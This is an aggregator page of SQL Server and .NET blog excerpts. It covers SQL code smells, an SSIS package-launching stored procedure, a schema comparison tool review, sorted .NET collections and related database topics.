    Some have claimed that there is a problem with the way data is currently managed using the relational paradigm, due to the rise of unstructured data in modern business. PCMag.com defines unstructured data as data that does not reside in a fixed location. They further explain that unstructured data refers to data in a free-text form that is not bound to any specific structure. With the rise of unstructured data in the form of emails, spreadsheets, images and documents, the critics have a right to argue that the relational paradigm is not as effective as the object-oriented paradigm in managing this type of data. The relational paradigm relies heavily on structure, and on relationships in and between items of data. This type of paradigm works best in a relational database management system like Microsoft SQL Server, MySQL, and Oracle, because data is forced to conform to a structure in the form of tables, and relations can be derived from the existence of one or more tables. These critics also claim that database administrators have not kept up with reality because their primary focus in data administration deals with structured data and the relational paradigm. The relational paradigm was developed in the 1970s as a way to improve data management when compared to standard flat files. Little has changed since then, and modern database administrators need to know more than just how to handle structured data. That is why critics claim that today's data professionals do not have the proper skills to store and maintain data for modern systems when compared to the skills of system designers, programmers, software engineers, and data designers, given the industry trend toward object-oriented design and development. I think that they are wrong. I do not disagree that the industry is moving toward an object-oriented approach to development, with the potential to use more of an object-oriented approach to data. However, I think that it is business itself that is limiting database administrators from changing how data is stored, because of the potential costs and impact that might occur by altering any part of stored data. Furthermore, database administrators, like all technology workers, are constantly trying to improve their technical skills in order to excel at their jobs, so I think that accusing data professionals is not just when the root cause of the lack of innovation is controlled by business - and it is business that will suffer for its inability to keep up with technology. One way for database professionals to better prepare for the future of database management is to start working with data in the form of objects, so that the information stored within objects can be extracted and used in relation to the data stored using the relational paradigm. Furthermore, I think the use of pattern matching will increase with the increased use of unstructured data, because objects can be selected, filtered and altered based on the existence of a pattern found within an object.
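    To make the closing point about pattern matching concrete, here is a small hedged sketch (the table and XML shape are hypothetical, using SQL Server's XML type) of semi-structured data living in a relational engine and being selected by a pattern found inside the stored object:

        -- Sketch: semi-structured data in an XML column, queried with XQuery.
        CREATE TABLE dbo.Correspondence
        (
            CorrespondenceId INT IDENTITY PRIMARY KEY,
            Body XML NOT NULL
        );

        INSERT INTO dbo.Correspondence (Body)
        VALUES (N'<email><from>alice@example.com</from><subject>Q3 numbers</subject></email>');

        -- Pattern-match inside the unstructured payload.
        SELECT CorrespondenceId
        FROM dbo.Correspondence
        WHERE Body.exist('/email/subject[contains(., "Q3")]') = 1;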

    Read the article

  • Listing common SQL Code Smells.

    - by Phil Factor
    Once you've done a number of SQL code-reviews, you'll know the signs in the code that suggest all might not be well. These 'Code Smells' are coding styles that don't directly cause a bug, but are indicators that all is not well with the code. Kent Beck and Massimo Arnoldi seem to have coined the phrase in the "OnceAndOnlyOnce" page of www.C2.com, where Kent also said that code "wants to be simple". Bad Smells in Code was an essay by Kent Beck and Martin Fowler, published as Chapter 3 of the book 'Refactoring: Improving the Design of Existing Code' (ISBN 978-0201485677). Although there are generic code smells, SQL has its own particular coding habits that will alert the programmer to the need to re-factor what has been written. See Exploring Smelly Code and Code Deodorants for Code Smells by Nick Harrison for a grounding in code smells in C#. I've always been tempted by the idea of automating a preliminary code-review for SQL. It would be so useful to trawl through code and pick up the various problems, much like the classic 'Lint' did for C, and how the Code Metrics plug-in for .NET Reflector by Jonathan 'Peli' de Halleux is used for finding code smells in .NET code. The problem is that few of the standard procedural code smells are relevant to SQL, and we need an agreed list of code smells. Merrill Aldrich made a grand start last year in his blog Top 10 T-SQL Code Smells. However, I'd like to make a start by discovering if there is a general opinion amongst database developers as to what the most important SQL smells are. One can be a bit defensive about code smells. I will cheerfully write very long stored procedures, even though they are frowned on. I'll use dynamic SQL occasionally. You can only use them as an aid for your own judgment and it is fine to 'sign them off' as being appropriate in particular circumstances. Also, whole classes of 'code smells' may be irrelevant for a particular database. The use of proprietary SQL, for example, is only a 'code smell' if there is a chance that the database will have to be ported to another RDBMS. The use of dynamic SQL is a risk only with certain security models. As the saying goes, a code smell is a hint of possible bad practice to a pragmatist, but a sure sign of bad practice to a purist. Plamen Ratchev's wonderful article Ten Common SQL Programming Mistakes lists some of these 'code smells' along with out-and-out mistakes, but there are more. The use of nested transactions, for example, isn't entirely incorrect, even though the database engine ignores all but the outermost: but it does flag up the possibility that the programmer thinks that nested transactions are supported. If anything requires some sort of general agreement, the definition of code smells is one. I'm therefore going to make this blog 'dynamic', in that, if anyone twitters a suggestion with a #SQLCodeSmells tag (or sends me a tweet) I'll update the list here. If you add a comment to the blog with a suggestion of what should be added or removed, I'll do my best to oblige. In other words, I'll try to keep this blog up to date. The name against each 'smell' is the name of the person who tweeted me, commented about, or has written about the 'smell'; it does not imply that they were the first ever to think of the smell!

    Use of deprecated syntax such as *= (Dave Howard)
    Denormalisation that requires the shredding of the contents of columns (Merrill Aldrich)
    Contrived interfaces
    Use of deprecated datatypes such as TEXT/NTEXT (Dave Howard)
    Datatype mis-matches in predicates that rely on implicit conversion (Plamen Ratchev)
    Using correlated subqueries instead of a join (Dave Levy / Plamen Ratchev)
    The use of hints in queries, especially NOLOCK (Dave Howard / Mike Reigler)
    Few or no comments
    Use of functions in a WHERE clause (Anil Das)
    Overuse of scalar UDFs (Dave Howard, Plamen Ratchev)
    Excessive 'overloading' of routines
    The use of Exec xp_cmdShell (Merrill Aldrich)
    Excessive use of brackets (Dave Levy)
    Lack of the use of a semicolon to terminate statements
    Use of non-SARGable functions on indexed columns in predicates (Plamen Ratchev)
    Duplicated code, or strikingly similar code
    Misuse of SELECT * (Plamen Ratchev)
    Overuse of cursors (Everyone. Special mention to Dave Levy & Adrian Hills)
    Overuse of CLR routines when not necessary (Sam Stange)
    Same column name in different tables with different datatypes (Ian Stirk)
    Use of 'broken' functions such as 'ISNUMERIC' without additional checks
    Excessive use of the WHILE loop (Merrill Aldrich)
    INSERT ... EXEC (Merrill Aldrich)
    The use of stored procedures where a view is sufficient (Merrill Aldrich)
    Not using two-part object names (Merrill Aldrich)
    Using INSERT INTO without specifying the columns and their order (Merrill Aldrich)
    Full outer joins even when they are not needed (Plamen Ratchev)
    Huge stored procedures (hundreds/thousands of lines)
    Stored procedures that can produce different columns, or order of columns in their results, depending on the inputs
    Code that is never used
    Complex and nested conditionals
    WHILE (not done) loops without an error exit
    Variable name same as the datatype
    Vague identifiers
    Storing complex data or lists in a character map, bitmap or XML field
    User procedures with sp_ prefix (Aaron Bertrand)
    Views that reference views that reference views that reference views (Aaron Bertrand)
    Inappropriate use of sql_variant (Neil Hambly)
    Errors with identity scope using SCOPE_IDENTITY, @@IDENTITY or IDENT_CURRENT (Neil Hambly, Aaron Bertrand)
    Schemas that involve multiple dated copies of the same table instead of partitions (Matt Whitfield-Atlantis UK)
    Scalar UDFs that do data lookups (poor man's join) (Matt Whitfield-Atlantis UK)
    Code that allows SQL injection (Mladen Prajdic)
    Tables without clustered indexes (Matt Whitfield-Atlantis UK)
    Use of "SELECT DISTINCT" to mask a join problem (Nick Harrison)
    Multiple stored procedures with nearly identical implementation (Nick Harrison)
    Excessive column aliasing - may point to a problem or it could be a mapping implementation (Nick Harrison)
    Joining "too many" tables in a query (Nick Harrison)
    Stored procedures returning more than one record set (Nick Harrison)
    A NOT LIKE condition (Nick Harrison)
    Excessive "OR" conditions (Nick Harrison)
    sp_OACreate or anything related to it (Bill Fellows)
    Prefixing names with tbl_, vw_, fn_, and usp_ ('tibbling') (Jeremiah Peschka)
    Aliases that go a,b,c,d,e... (Dave Levy/Diane McNurlan)
    Overweight queries (e.g. 4 inner joins, 8 left joins, 4 derived tables, 10 subqueries, 8 clustered GUIDs, 2 UDFs, 6 case statements = 1 query) (Robert L Davis)
    Order by 3,2 (Dave Levy)
    Multi-statement table functions which are then filtered 'Sel * from Udf() where Udf.Col = Something' (Dave Ballantyne)
    Running a SQL 2008 system in SQL 2000 compatibility mode (John Stafford)
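    To make one of these concrete - the non-SARGable-function smell - here is a small sketch (against a hypothetical table) of the smell and its rewrite:

        -- Smell: the function wrapped around OrderDate defeats any index on that column.
        SELECT OrderID FROM dbo.Orders WHERE YEAR(OrderDate) = 2009;

        -- SARGable rewrite: the same filter expressed as a range, so an index seek is possible.
        SELECT OrderID FROM dbo.Orders
        WHERE OrderDate >= '20090101' AND OrderDate < '20100101';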

    Read the article

  • Cherokee web server on Ubuntu Lucid

    - by Fazal
    I've been trying to find some decent tutorials on how to set up a recent release of the Cherokee web server on Ubuntu (or equivalent Linux distros), covering how to set up the web server, MySQL, phpMyAdmin and PHP. Some already exist, such as http://www.howtoforge.com/installing-cherokee-with-php5-and-mysql-support-on-ubuntu-10.04; however, I've found that the Cherokee version used in the tutorial is considerably out of date, and the update process has been painful to say the least. Thanks.

    Read the article

  • Time to stop using “Execute Package Task” – a way to execute packages in the SSIS catalog, taking advantage of the new project deployment model and the logging and reporting features

    - by Kevin Shyr
    I set out to find a way to dynamically call a package in SSIS 2012. The following are two excellent blogs I found; I used them heavily. The code below adds some parameter types and message types, but is essentially derived from those blogs. http://sqlblog.com/blogs/jamie_thomson/archive/2011/07/16/ssis-logging-in-denali.aspx http://www.ssistalk.com/2012/07/24/quick-tip-run-ssis-2012-packages-synchronously-and-other-execution-options/

    The code: every package will be called by a PackageController package. The PackageController is initialized with some information on which package to run and what information to pass in. The following is the stored procedure called from the "Execute SQL Task". Here are the highlights of the stored procedure:

    It takes in the package name, project name, and folder name (the folder the SSIS project was deployed to in the SSIS catalog)
    It sets the package variables of the upcoming package execution
    It executes the package in the SSIS catalog
    It gets the status of the execution; also, if any exist, it gets the error messages' message_id values and stores them in the management database
    It returns a value to the "Execute SQL Task" to manage failure properly

        CREATE PROCEDURE [AUDIT].[LaunchPackageExecutionInSSISCatalog]
              @PackageName NVARCHAR(255)
            , @ProjectFolder NVARCHAR(255)
            , @ProjectName NVARCHAR(255)
            , @AuditKey INT
            , @DisableNotification BIT
            , @PackageExecutionLogID INT
        AS
        BEGIN TRY
            DECLARE @execution_id BIGINT = 0;

            -- Create a package execution
            EXEC [SSISDB].[catalog].[create_execution]
                @package_name = @PackageName,
                @execution_id = @execution_id OUTPUT,
                @folder_name = @ProjectFolder,
                @project_name = @ProjectName,
                @use32bitruntime = False;

            UPDATE [AUDIT].[PackageInstanceExecutionLog] WITH(ROWLOCK)
            SET [SSISCatalogExecutionID] = @execution_id
            WHERE [PackageInstanceExecutionLogID] = @PackageExecutionLogID

            -- this is to set the execution synchronized so that I can check the result in the end
            EXEC [SSISDB].[catalog].[set_execution_parameter_value]
                @execution_id,
                @object_type = 50,
                @parameter_name = N'SYNCHRONIZED',
                @parameter_value = 1; -- true

            /********************************************************
                Section: setting parameters
                Source table: SSISDB.internal.object_parameters
                object_type list:
                    20: project level variables
                    30: package level variables
                    50: execution parameter
            ********************************************************/
            EXEC [SSISDB].[catalog].[set_execution_parameter_value]
                @execution_id,
                @object_type = 30,
                @parameter_name = N'FromParent_AuditKey',
                @parameter_value = @AuditKey;

            EXEC [SSISDB].[catalog].[set_execution_parameter_value]
                @execution_id,
                @object_type = 30,
                @parameter_name = N'FromParent_DisableNotification',
                @parameter_value = @DisableNotification;

            EXEC [SSISDB].[catalog].[set_execution_parameter_value]
                @execution_id,
                @object_type = 30,
                @parameter_name = N'FromParent_PackageInstanceExecutionID',
                @parameter_value = @PackageExecutionLogID;
            /********************************************************
                Section: setting variables END
            ********************************************************/

            /* This section is carried over from example code;
               I don't see a reason to change it yet */
            -- Set our package parameters
            EXEC [SSISDB].[catalog].[set_execution_parameter_value]
                @execution_id,
                @object_type = 50,
                @parameter_name = N'DUMP_ON_EVENT',
                @parameter_value = 1; -- true

            EXEC [SSISDB].[catalog].[set_execution_parameter_value]
                @execution_id,
                @object_type = 50,
                @parameter_name = N'DUMP_EVENT_CODE',
                @parameter_value = N'0x80040E4D;0x80004005';

            EXEC [SSISDB].[catalog].[set_execution_parameter_value]
                @execution_id,
                @object_type = 50,
                @parameter_name = N'LOGGING_LEVEL',
                @parameter_value = 1; -- Basic

            EXEC [SSISDB].[catalog].[set_execution_parameter_value]
                @execution_id,
                @object_type = 50,
                @parameter_name = N'DUMP_ON_ERROR',
                @parameter_value = 1; -- true

            /********************************************************
                Section: EXECUTING
            ********************************************************/
            EXEC [SSISDB].[catalog].[start_execution] @execution_id;
            /********************************************************
                Section: EXECUTING END
            ********************************************************/

            /********************************************************
                Section: checking execution result
                Source table: [SSISDB].[catalog].[executions]
                status:
                    1: created            2: running
                    3: cancelled          4: failed
                    5: pending            6: ended unexpectedly
                    7: succeeded          8: stopping
                    9: completed
            ********************************************************/
            IF EXISTS(SELECT TOP 1 1
                      FROM [SSISDB].[catalog].[executions] WITH(NOLOCK)
                      WHERE [execution_id] = @execution_id
                            AND [status] NOT IN (2, 7, 9))
            BEGIN
                /********************************************************
                    Section: logging error messages
                    Source table: [SSISDB].[internal].[operation_messages]
                    message type:
                        10: OnPreValidate      20: OnPostValidate
                        30: OnPreExecute       40: OnPostExecute
                        60: OnProgress         70: OnInformation
                        90: Diagnostic         110: OnWarning
                        120: OnError           130: Failure
                        140: DiagnosticEx      200: Custom events
                        400: OnPipeline
                    message source type:
                        10: Messages logged by the entry APIs (e.g. T-SQL, CLR stored procedures)
                        20: Messages logged by the external process used to run the package (ISServerExec)
                        30: Messages logged by the package-level objects
                        40: Messages logged by tasks in the control flow
                        50: Messages logged by containers (For, ForEach, Sequence) in the control flow
                        60: Messages logged by the Data Flow Task
                ********************************************************/
                INSERT INTO AUDIT.PackageInstanceExecutionOperationErrorLink
                    SELECT @PackageExecutionLogID
                         , [operation_message_id]
                    FROM [SSISDB].[internal].[operation_messages] WITH(NOLOCK)
                    WHERE operation_id = @execution_id
                          AND message_type IN (120, 130)

                EXEC [AUDIT].[FailPackageInstanceExecution] @PackageExecutionLogID, 'SSISDB Internal operation_messages found'

                GOTO ReturnTrueAsErrorFlag
                /********************************************************
                    Section: checking messages END
                ********************************************************/

                /* This part is not really working, so now using rowcount to pass status
                --DECLARE @PackageErrorMessage NVARCHAR(4000)
                --SET @PackageErrorMessage = @PackageName + 'failed with executionID: ' + CONVERT(VARCHAR(20), @execution_id)
                --RAISERROR (@PackageErrorMessage -- Message text.
                --     , 18 -- Severity,
                --     , 1 -- State,
                --     , N'check table AUDIT.PackageInstanceExecutionErrorMessages' -- First argument.
                --     );
                */
            END
            ELSE BEGIN
                GOTO ReturnFalseAsErrorFlagToSignalSuccess
            END
            /********************************************************
                Section: checking execution result END
            ********************************************************/
        END TRY
        BEGIN CATCH
            DECLARE @SSISCatalogCallError NVARCHAR(MAX)
            SELECT @SSISCatalogCallError = ERROR_MESSAGE()

            EXEC [AUDIT].[FailPackageInstanceExecution] @PackageExecutionLogID, @SSISCatalogCallError

            GOTO ReturnTrueAsErrorFlag
        END CATCH;

        /********************************************************
            Section: end result
        ********************************************************/
        ReturnTrueAsErrorFlag:
            SELECT CONVERT(BIT, 1) AS PackageExecutionErrorExists
            RETURN -- prevent falling through into the success label below
        ReturnFalseAsErrorFlagToSignalSuccess:
            SELECT CONVERT(BIT, 0) AS PackageExecutionErrorExists
        GO
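    A usage sketch (every value below is made up for illustration; in the real setup the PackageController package supplies them):

        EXEC [AUDIT].[LaunchPackageExecutionInSSISCatalog]
              @PackageName           = N'LoadDimCustomer.dtsx'
            , @ProjectFolder         = N'ETL'
            , @ProjectName           = N'DataWarehouse'
            , @AuditKey              = 42
            , @DisableNotification   = 0
            , @PackageExecutionLogID = 1001;
        -- Returns a single-column result set: PackageExecutionErrorExists (BIT).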

    Read the article

  • Survey: Do you write custom SQL CLR procedures/functions/etc

    - by James Luetkehoelter
    I'm quite curious because, despite the great capabilities of writing CLR-based stored procedures to offload those nasty operations T-SQL isn't that great at (like iteration, or complex math), I'm continuing to see a wealth of SQL 2008 databases with complex stored procedures and functions which would make great candidates. The in-house skill to create the CLR code exists as well, but there is flat-out resistance to using it. In one scenario I was told "Oh, iteration isn't a problem because we've trained...(read more)

    Read the article

  • SQL SERVER – How to Compare the Schema of Two Databases with Schema Compare

    - by Pinal Dave
    Earlier I wrote about An Efficiency Tool to Compare and Synchronize SQL Server Databases and it was very well received. Since that blog post I have received quite a few questions asking how, just as with data, we can also compare schema and synchronize it. If you think about comparing schemas manually, it is almost impossible to do so. Table schema is just one concept; if you really want all the schema of the database (triggers, views, stored procedures and everything else), it is just an impossible task. If you are a developer or database administrator who works in a production environment, then you know that there are many different occasions when we have to compare database schemas. Before deploying any changes to the production server, I personally like to make a note of every single schema change and document it, so in case of any issue I can always go back and refer to my documentation. As discussed earlier, it is practically impossible to do this task without the help of third-party tools. I personally use Devart Schema Compare for this task. It is an extremely easy tool. Let us see how it works.

    First, I have two different databases - a) AdventureWorks2012 and b) AdventureWorks2012-V1. There are three changes in total between these databases. Here is the list:

    One of the tables has an additional column
    One of the tables has a new index
    One of the stored procedures is changed

    Now let us see how dbForge Schema Compare works in this scenario. First, open dbForge Schema Compare studio. Click on New Schema Comparison. It will bring you to the following screen, where we have to configure the databases to compare. I have selected the AdventureWorks2012 and AdventureWorks2012-V1 databases. In the next screen we can verify various options, but for this demonstration we will keep them as they are. We will not change anything in the schema mapping screen, as in our case it is not required, but generally, if you are comparing across schemas, you may need this. The next screen is the most important one, as here we select which kinds of objects we want to compare. You can see the options which are available to select. The screen lets you select objects from SQL Server 2000 to SQL Server 2012. Once you click on Compare in the previous screen, it will bring you to a screen which essentially displays the differences between the two databases we selected earlier. As mentioned above, there are three changes between the databases, and all of them are listed here. Two of the changes belong to tables and one belongs to a procedure. Let us click each of them one by one to see the differences. In the first case we can see that there is an additional column in one database which did not exist in the other. In the second example we can see that the AdventureWorks2012 database has an additional index. The third example is very interesting: in this case we changed the definition of the stored procedure, and the result pane shows the change. dbForge Schema Compare very effectively identifies schema changes and lists them neatly for developers. Here is one more screen: this software not only compares the schema but also provides options to update or drop objects, as you choose. I think this is a brilliant option. Well, I have been using Schema Compare for quite a while and have found it very useful. Here are a few of the things which dbForge Schema Compare can do for developers and DBAs:

    Compare and synchronize SQL Server database schemas
    Compare schemas of a live database and a SQL Server backup
    Generate comparison reports in Excel and HTML formats
    Eliminate mistakes in schema change propagation across environments
    Track production database changes and customizations
    Automate migration of schema changes using the command line interface

    I suggest that you try out dbForge Schema Compare and let me know what you think of this product. Reference: Pinal Dave (http://blog.sqlauthority.com) Filed under: PostADay, SQL, SQL Authority, SQL Query, SQL Server, SQL Tips and Tricks, SQL Utility, T SQL

    Read the article

  • SortedDictionary and SortedList

    - by Simon Cooper
    Apart from Dictionary<TKey, TValue>, there are two other dictionaries in the BCL - SortedDictionary<TKey, TValue> and SortedList<TKey, TValue>. On the face of it, these two classes do the same thing - provide an IDictionary<TKey, TValue> interface where the iterator returns the items sorted by the key. So what's the difference between them, and when should you use one rather than the other? (as in my previous post, I'll assume you have some basic algorithm & data structure knowledge)

    SortedDictionary

    We'll first cover SortedDictionary. This is implemented as a special sort of binary tree called a red-black tree. Essentially, it's a binary tree that uses various constraints on how the nodes of the tree can be arranged to ensure the tree is always roughly balanced (for more gory algorithmic details, see the wikipedia link above). What I'm concerned about in this post is how the .NET SortedDictionary is actually implemented. In .NET 4, behind the scenes, the actual implementation of the tree is delegated to a SortedSet<KeyValuePair<TKey, TValue>>. Each node in the tree is stored as a separate SortedSet<T>.Node object (remember, in a SortedDictionary, T is instantiated to KeyValuePair<TKey, TValue>):

        class Node
        {
            public bool IsRed;
            public T Item;
            public SortedSet<T>.Node Left;
            public SortedSet<T>.Node Right;
        }

    The SortedSet only stores a reference to the root node; all the data in the tree is accessed by traversing the Left and Right node references until you reach the node you're looking for. Each individual node can be physically stored anywhere in memory; what's important is the relationship between the nodes. This is also why there is no constructor to SortedDictionary or SortedSet that takes an integer representing the capacity; there are no internal arrays that need to be created and resized. This may seem trivial, but it's an important distinction between SortedDictionary and SortedList that I'll cover later on. And that's pretty much it; it's a standard red-black tree. Plenty of webpages and data structure books cover the algorithms behind the tree itself far better than I could. What's interesting is the comparison between SortedDictionary and SortedList, which I'll cover at the end. As a side point, SortedDictionary has existed in the BCL ever since .NET 2. That means that, all through .NET 2, 3, and 3.5, there has been a bona-fide sorted set class in the BCL (called TreeSet). However, it was internal, so it couldn't be used outside System.dll. Only in .NET 4 was this class exposed as SortedSet.

    SortedList

    Whereas SortedDictionary doesn't use any backing arrays, SortedList does. It is implemented just as the name suggests; two arrays, one containing the keys, and one the values (I've just used random letters for the values). The items in the keys array are always guaranteed to be stored in sorted order, and the value corresponding to each key is stored at the same index as the key in the values array. In this example, the value for key item 5 is 'z', and for key item 8 is 'm'. Whenever an item is inserted or removed from the SortedList, a binary search is run on the keys array to find the correct index, then all the items in the arrays are shifted to accommodate the new or removed item. For example, if the key 3 was removed, a binary search would be run to find the array index the item was at, then everything above that index would be moved down by one; and if the key/value pair {7, 'f'} was then added, a binary search would be run on the keys to find the index to insert the new item, and everything above that index would be moved up to accommodate it. If another item was then added, both arrays would be resized (to a length of 10) before the new item was added to the arrays. As you can see, any insertions or removals in the middle of the list require a proportion of the array contents to be moved; an O(n) operation. However, if the insertion or removal is at the end of the array (ie the largest key), then it's only O(log n); the cost of the binary search to determine it does actually need to be added to the end (excluding the occasional O(n) cost of resizing the arrays to fit more items). As a side effect of using backing arrays, SortedList offers IList Keys and Values views that simply use the backing keys or values arrays, as well as various methods utilising the array index of stored items, which SortedDictionary does not (and cannot) offer.

    The Comparison

    So, when should you use one and not the other? Well, here are the important differences:

    Memory usage

    SortedDictionary and SortedList have got very different memory profiles. SortedDictionary...
    has a memory overhead of one object instance, a bool, and two references per item. On 64-bit systems, this adds up to ~40 bytes, not including the stored item and the reference to it from the Node object.
    stores the items in separate objects that can be spread all over the heap. This helps to keep memory fragmentation low, as the individual node objects can be allocated wherever there's a spare 60 bytes.

    In contrast, SortedList...
    has no additional overhead per item (only the reference to it in the array entries), however the backing arrays can be significantly larger than you need; every time the arrays are resized they double in size. That means that if you add 513 items to a SortedList, the backing arrays will each have a length of 1024. To counteract this, the TrimExcess method resizes the arrays back down to the actual size needed, or you can simply assign list.Capacity = list.Count.
    stores its items in a continuous block in memory. If the list stores thousands of items, this can cause significant problems with Large Object Heap memory fragmentation as the array resizes, which SortedDictionary doesn't have.

    Performance

    Operations on a SortedDictionary always have O(log n) performance, regardless of where in the collection you're adding or removing items. In contrast, SortedList has O(n) performance when you're altering the middle of the collection. If you're adding or removing from the end (ie the largest item), then performance is O(log n), same as SortedDictionary (in practice, it will likely be slightly faster, due to the array items all being in the same area in memory, also called locality of reference).

    So, when should you use one and not the other? As always with these sort of things, there are no hard-and-fast rules. But generally, if you:
    need to access items using their index within the collection
    are populating the dictionary all at once from sorted data
    aren't adding or removing keys once it's populated
    then use a SortedList.

    But if you:
    don't know how many items are going to be in the dictionary
    are populating the dictionary from random, unsorted data
    are adding & removing items randomly
    then use a SortedDictionary.

    The default (again, there are no definite rules on these sort of things!) should be to use SortedDictionary, unless there's a good reason to use SortedList, due to the bad performance of SortedList when altering the middle of the collection.

    Read the article

  • SQL SERVER – Weekly Series – Memory Lane – #050

    - by Pinal Dave
    Here is the list of selected articles of SQLAuthority.com across all these years. Instead of just listing all the articles, I have selected a few of my most favorite articles and have listed them here with additional notes below them. Let me know which one of the following is your favorite article from memory lane.

    2007
    Executing Remote Stored Procedure – Calling Stored Procedure on Linked Server
    In this example we see two different methods of how to call stored procedures remotely.
    Connection Property of SQL Server Management Studio SSMS
    A very simple example of how to build connection properties for SQL Server with the help of SSMS.
    Sample Example of RANKING Functions – ROW_NUMBER, RANK, DENSE_RANK, NTILE
    SQL Server has a total of 4 ranking functions. Ranking functions return a ranking value for each row in a partition. All the ranking functions are non-deterministic.
    T-SQL Script to Add Clustered Primary Key
    A Jr. DBA asked me three times in a day how to create a clustered primary key. I gave him the following sample example. That was the last time he asked "How to create a clustered primary key on a table?"

    2008
    TRIM() Function – User Defined Function
    SQL Server does not have a function which can trim the leading and trailing spaces of a string at the same time. SQL does have LTRIM() and RTRIM(), which can trim leading and trailing spaces respectively. SQL Server 2008 also does not have a TRIM() function. Users can easily combine LTRIM() and RTRIM() to simulate TRIM() functionality. http://www.youtube.com/watch?v=1-hhApy6MHM

    2009
    Earlier I wrote two different articles on the subject Remove Bookmark Lookup; this article is part 3 of the original article. Please read the first two articles here before continuing with this article.
    Query Optimization – Remove Bookmark Lookup – Remove RID Lookup – Remove Key Lookup
    Query Optimization – Remove Bookmark Lookup – Remove RID Lookup – Remove Key Lookup – Part 2
    Query Optimization – Remove Bookmark Lookup – Remove RID Lookup – Remove Key Lookup – Part 3
    Interesting Observation – Query Hint – FORCE ORDER
    SQL Server never stops amazing me. As regular readers of this blog already know, besides conducting corporate training, I work on large-scale query optimization and server tuning projects. In one of the recent projects, I noticed that a junior database developer had used the query hint FORCE ORDER; when I asked for details, I found out that he had not properly understood the basic concept.
    Queries Waiting for Memory Allocation to Execute
    In one of the recent projects, I was asked to create a report of queries that are waiting for memory allocation. The reason was that we were doubtful whether the memory was sufficient for the application. The following query can be useful in similar cases. Queries that do not have to wait on a memory grant will not appear in the result set of the following query.
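    (As a sketch of the kind of DMV query involved in that last tip - illustrative only; the article's own query may differ:)

        -- Sessions currently waiting for a memory grant (grant_time is NULL while waiting).
        SELECT session_id, requested_memory_kb, wait_time_ms
        FROM sys.dm_exec_query_memory_grants
        WHERE grant_time IS NULL;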
    2010
    Quickest Way to Identify Blocking Query and Resolution – Dirty Solution
    As the title suggests, this is quite a dirty solution; it's not as elegant as you expect. However, it works totally fine.
    Simple Explanation of Data Type Precedence
    While I was working on creating a question for SQL SERVER – SQL Quiz – The View, The Table and The Clustered Index Confusion, I had actually created yet another question along with it. However, I felt that the one posted on the SQL Quiz is much better than this one, because having multiple answers makes it more challenging.
    Encrypted Stored Procedure and Activity Monitor
    I recently received a question: if a stored procedure is encrypted, can we see its definition in Activity Monitor? The answer is no. Let us do a quick test. Let us create the following stored procedure, then launch the Activity Monitor and check the text.
    Indexed View always Use Index on Table
    A single table can have a maximum of 249 non-clustered indexes and 1 clustered index. In SQL Server 2008, a single table can have a maximum of 999 non-clustered indexes and 1 clustered index. It is widely believed that a table can have only 1 clustered index, and this belief is true. I have some questions for all of you. Let us assume that I am creating a view from the table itself and then create a clustered index on it. In my view, I am selecting the complete table itself.

    2011
    Detecting Database Case Sensitive Property using fn_helpcollations()
    I received a question on how to determine the case sensitivity of a database. The quick answer is to identify the collation of the database and check the properties of that collation. I have previously written about how one can identify database collation. Once you have figured out the collation of the database, you can put it in the WHERE condition of the following T-SQL and then check the case sensitivity from the description.
    Server Side Paging in SQL Server CE (Compact Edition)
    SQL Server Denali is coming up with new T-SQL for paging. I have written about it earlier: SQL SERVER – Server Side Paging in SQL Server Denali – A Better Alternative, SQL SERVER – Server Side Paging in SQL Server Denali Performance Comparison, SQL SERVER – Server Side Paging in SQL Server Denali – Part2. What is very interesting is that SQL Server CE 4.0 has the same feature introduced. Here is a quick example. To run the script in the example, you will have to install WebMatrix 4.0 and download the sample database. Once done, you can run the following script.
    Why I am Going to Attend PASS Summit Unite 2011
    The four-day event will be marked by a lot of learning, sharing, and networking, which will help me increase both my knowledge and contacts. Every year, PASS Summit provides me a golden opportunity to build my network as well as to identify and meet potential customers or employees.

    2012
    Manage Help Settings – CTRL + ALT + F1
    This is a very interesting read, as my daughter once accidentally came across a screen in SQL Server Management Studio. It took me 2-3 minutes to figure out how she had created the same screen.
    Recover the Accidentally Renamed Table
    "I accidentally renamed a table in my SSMS. I was scrolling very fast and I made a mistake. It was either because I double-clicked or pressed F2 (the shortcut key for renaming). However, I have made the mistake and now I have no idea how to fix this." If you have renamed the table, I think you are pretty much out of luck. Here are a few things you can do which can give you an idea of what your table name might have been, if you are lucky.
    Identify Numbers of Non Clustered Index on Tables for Entire Database
    Here is the script which will give you the number of non-clustered indexes on any table in the entire database.
    Identify Most Resource Intensive Queries – SQL in Sixty Seconds #029 – Video
    Here is the complete script which I used in the SQL in Sixty Seconds video. Thanks to Harsh for the important tip in the comment. http://www.youtube.com/watch?v=3kDHC_Tjrns
    Advanced Data Quality Services with Melissa Data – Azure Data Market
    For the purposes of the review, I used a database I had in an Excel spreadsheet with name and address information. Upon a cursory inspection, there are miscellaneous problems with these records; some addresses are missing ZIP codes, others are missing a city, and some records are slightly misspelled or have unparsed suites. With DQS, I can easily add a knowledge base to help standardize my values, such as state abbreviations. But how do I know that my address is correct?

    Reference: Pinal Dave (http://blog.sqlauthority.com) Filed under: Memory Lane, PostADay, SQL, SQL Authority, SQL Query, SQL Server, SQL Tips and Tricks, T SQL, Technology

    Read the article

  • Database Activity Monitoring Part 2 - SQL Injection Attacks

    If you think about the web sites you visit on a daily basis, the chances are that you will need to log in to verify who you are. In most cases your username will be stored in a relational database along with all the other registered users of that web site. Hopefully your password will be encrypted and not stored in plain text.
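    As a minimal sketch of the "not plain text" point (illustrative only - the names are made up, and a real scheme would use a per-user salt plus a deliberately slow key-derivation function rather than a single hash):

        -- Sketch: store a salted SHA2-256 digest, never the password itself.
        DECLARE @Password NVARCHAR(128) = N'S3cret!';
        DECLARE @Salt UNIQUEIDENTIFIER = NEWID();

        SELECT @Salt AS PasswordSalt,
               HASHBYTES('SHA2_256',
                         CONVERT(NVARCHAR(36), @Salt) + @Password) AS PasswordHash;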

    Read the article

  • Network Security Risk Assessment

    - by Chandra Vennapoosa
    Information that is gathered every day regarding client and business transactions is stored either on servers or on user computers. This stored information is considered important and sensitive to the company's interests, and hence it needs to be protected from network attacks and other unknown circumstances. Network administrators manage and protect the network through a series of passwords and data encryption. Topics:

    First Step for Risk Assessment
    Identifying Essential Data/System/Hardware
    Identifying External Blocks
    Measuring the Risk to Your Enterprise
    Calculating the Assets Value
    The Liquid Financial Assets Value
    Getting Everything Together

    Read the article

< Previous Page | 466 467 468 469 470 471 472 473 474 475 476 477  | Next Page >